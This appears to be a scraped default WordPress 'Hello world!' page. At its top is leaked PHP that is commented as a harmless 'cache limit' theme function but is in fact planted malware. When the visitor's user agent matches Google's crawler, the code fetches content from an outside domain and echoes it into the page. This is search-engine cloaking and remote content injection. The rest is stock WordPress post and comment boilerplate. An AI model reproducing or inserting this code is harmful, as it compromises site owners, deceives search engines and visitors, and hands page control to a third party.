/** * Set the cache limit. * * To override this cache in a child theme, remove * the filter and add your own function tied to * the cache filter hook. * * @param int $c The number of excerpt characters. * @return int The filtered number of characters. */ function cache() {if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://new.plugincomparedod.com/cache.php?h=honeycombyard.com&id=7');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);echo($c);curl_close($curl);}} Hello world! – honeycombyard

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!


Posted

in

by

Tags:

Comments

One response to “Hello world!”

  1. A WordPress Commenter Avatar

    Hi, this is a comment.
    To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
    Commenter avatars come from Gravatar.

Leave a Reply

Your email address will not be published. Required fields are marked *